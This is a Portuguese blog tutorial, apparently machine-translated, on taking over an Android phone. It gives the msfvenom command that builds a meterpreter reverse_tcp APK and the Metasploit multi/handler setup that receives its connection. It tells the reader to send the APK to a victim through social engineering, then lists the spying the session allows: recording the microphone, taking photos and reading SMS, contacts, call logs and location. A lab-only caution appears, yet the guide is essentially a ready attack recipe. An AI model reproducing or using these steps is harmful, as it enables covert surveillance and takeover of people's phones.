WWW.FLEPS.COM.BR

Como assumir o controle de um dispositivo Android em menos de um minuto

By admin at 2018-06-19 • 1 colecionador • 2148 visualizações de página

Como é de conhecimento público, o sistema operacional Android cobre aproximadamente 85% do mercado, superando a Apple e o Windows Phone. É por isso que é tão importante mostrar alguns dos ataques que podem ser feitos para nos tornarmos conscientes da segurança dos dispositivos e das informações que um usuário expõe em seus dispositivos.


Primeiro de tudo, bom dia, hoje vamos tentar um tema recorrente que muitas pessoas acreditam que é isento, o ataque em dispositivos Android, eu vou tentar mostrar como com algumas linhas de comando simples e alguma engenharia parceiro como nós têm acesso a um dispositivo Android, lembre-se sempre trabalhar em um ambiente de laboratório 

necessidade:

    1 Máquina Virtual com KALI 2.0 ou Backtrack (usaremos Metasploit) 
    1 Máquina Virtual com Android 

vai:

A criação da máquina virtual KALI é explicado no post anterior por isso aqui está fora, agora vamos nos concentrar em criar a máquina virtual com Android que particularmente para mim foi muito difícil encontrar nada parecido perfeitamente possível Dispositivo Android, que também é fácil e rápido, já que geralmente a virtualização desse tipo de dispositivo consome recursos suficientes.

Neste caso, eu vou usar o Genymotion é um emulador Android que usa a arquitetura x86 para rodar dispositivos Android fluidos e rapidamente diferentes. Esquecendo a lentidão do emulador Android nativo, podemos executar todos os tipos de aplicativos e jogos em nosso Windows, Mac ou Linux. Um dos principais usos do Genymotion é facilitar o desenvolvimento de aplicativos Android. Quase mais de 900.000 usuários registrados usam suas máquinas virtuais para criar aplicativos usando o Eclipse ou o intelliJ. Eles se integram perfeitamente com o adb, a linha de comando e os diferentes ambientes de desenvolvimento. Podemos lançar em apenas alguns segundos os aplicativos conectados ao ADT do IDE para testá-lo. Muito tempo economizado. O Genymotion é baseado no uso de máquinas virtuais x86 otimizadas para rodar na Virtual box.

Aqui deixo o link onde baixá-lo: https://www.genymotion.com/#!/download (esclarecimento, primeiro um usuário deve ser criado, pois é necessário baixar o dispositivo posteriormente). 

Uma vez baixado Genymotion pode ser baixado pelo Android versão (atualmente versão 2.3.7, desde então, a 5.1.0) ou dispositivo onde eles podem escolher a partir de marcas como Sony, Samsung, HTC, Motorola, Google, entre outros, cada um dos versões com diferentes requisitos.


Quando terminamos de baixar a versão do dispositivo que precisamos, temos mais ou menos assim: (no meu caso, baixe o modelo Nexus 5 com Android 4.4.4)


Tudo que você precisa fazer é clicar em "Iniciar" para iniciar a máquina virtual e nos ver da seguinte maneira:


Pronto! Eu já tenho meu Nexus 5 em execução e pronto para fazer os testes que preciso! 

Agora, se vamos para KALI preparar o aplicativo malicioso (File pacote de aplicações ou ".apk") 

criou o arquivo malicioso, para que MSFVENOM uso de um terminal: 

msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_KALI LPORT=Porta_KALI R > /root/AplicacionMaliciosa.apk


Ok, eu tenho o meu malicioso APK:


O próximo passo é para parar de "escuta" de KALI até que a vítima executar o aplicativo, de modo que abrimos Metasploit e configure -o da seguinte forma: 

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST IP_KALI
set LPORT Puerto_KALI
exploit



Agora devemos enviar o APK malicioso para a nossa vítima usar um pouco de Engenharia Social 
e podemos esperar que a vítima o execute depois disso obteremos o seguinte:


Android hackeado !!



Pronto! sessão Meterpreter conectado a nossa vítima, neste caso, você pode ver que o "sysinfo" comando diz-me que a vítima tem uma 4.4.4 Android 

Com o comando de ajuda que você pode ver que ações que pode fazer no dispositivo, muitas das ações ter sido explicado no post anterior, mas as ações particulares do Android são: 

    Gravar com microfone 
    tirar fotos com as duas câmeras (frontal e traseira) 
    fazem Streming da câmera selecionada 
    Verifique se o dispositivo está enraizada 
    Obter a lista de chamadas 
    obter a lista de Contatos 
    Obter SMS 
    Obter localização do dispositivo 
    Enviar SMS 
    Entre outras coisas ...


ESCLARECIMENTO!: O dispositivo tem que permitir o uso de aplicativos de origem desconhecida.


Autor: Matias


1 Respostas | Última atualização 2019-02-12
2019-02-12   #1

como eu posso baixar o KALI?

Requer login

Loading...
:79::65::p:78::57:;):77::51::D:76:
:2::icon_syria_lovely::o:75::1::):clap::71::(:70: